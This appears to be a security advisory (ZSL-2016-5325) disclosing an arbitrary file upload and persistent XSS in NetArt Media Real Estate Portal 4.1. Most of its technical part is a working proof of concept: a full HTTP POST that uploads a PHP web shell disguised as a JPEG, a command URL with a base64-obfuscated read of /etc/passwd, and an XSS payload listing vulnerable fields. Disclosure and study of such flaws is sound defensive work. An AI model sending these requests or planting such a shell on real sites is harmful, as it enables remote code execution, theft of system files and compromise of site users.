86 lines
No EOL
2.7 KiB
Text
86 lines
No EOL
2.7 KiB
Text
Real Estate Portal v4.1 Remote Code Execution Vulnerability
|
|
|
|
|
|
Vendor: NetArt Media
|
|
Product web page: http://www.netartmedia.net
|
|
Affected version: 4.1
|
|
|
|
Summary: Real Estate Portal is a software written in PHP,
|
|
allowing you to launch powerful and professional looking
|
|
real estate portals with rich functionalities for the private
|
|
sellers, buyers and real estate agents to list properties
|
|
for sale or rent, search in the database, show featured
|
|
ads and many others. The private sellers can manage their
|
|
ads at any time through their personal administration space.
|
|
|
|
Desc: Real Estate Portal suffers from an arbitrary file upload
|
|
vulnerability leading to an arbitrary PHP code execution. The
|
|
vulnerability is caused due to the improper verification of
|
|
uploaded files in '/upload.php' script thru the 'myfile' POST
|
|
parameter. This can be exploited to execute arbitrary PHP code
|
|
by uploading a malicious PHP script file with '.php' extension
|
|
that will be stored in the '/uploads' directory.
|
|
|
|
Tested on: nginx/1.10.0
|
|
PHP/5.2.17
|
|
MySQL/5.1.66
|
|
|
|
|
|
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2016-5325
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5325.php
|
|
|
|
|
|
06.05.2016
|
|
|
|
---
|
|
|
|
|
|
1. Arbitrary File Upload:
|
|
-------------------------
|
|
|
|
Parameter: myfile (POST)
|
|
POC URL: http://localhost/uploads/Test.php?cmd=cat%20$%28echo%20L2V0Yy9wYXNzd2Q=%20|%20base64%20-d%29
|
|
|
|
POST /upload.php HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
X-Requested-With: XMLHttpRequest
|
|
Referer: http://localhost/USERS/index.php
|
|
Content-Length: 419
|
|
Content-Type: multipart/form-data; boundary=---------------------------8914507815764
|
|
Cookie: PHPSESSID=7k4au5p4m0skscj4gjbfedfjs5; AuthU=demo%7Efe01ce2a7fbac8fafaed7c982a04e229%7E1462616214
|
|
Connection: close
|
|
|
|
-----------------------------8914507815764
|
|
Content-Disposition: form-data; name="myfile"; filename="Test.php"
|
|
Content-Type: image/jpeg
|
|
|
|
<?php
|
|
system($_GET['cmd']);
|
|
?>
|
|
|
|
-----------------------------8914507815764
|
|
Content-Disposition: form-data; name=""
|
|
|
|
undefined
|
|
-----------------------------8914507815764
|
|
Content-Disposition: form-data; name=""
|
|
|
|
undefined
|
|
-----------------------------8914507815764--
|
|
|
|
|
|
|
|
2. Persistent Cross Site Scripting:
|
|
-----------------------------------
|
|
|
|
http://localhost/USERS/index.php
|
|
Parameters: title, html, headline, size, youtube_id, address, latitude, longitude, user_first_name, user_last_name, agency, user_phone, user_email, website (POST)
|
|
Payload: " onmousemove=alert(1) |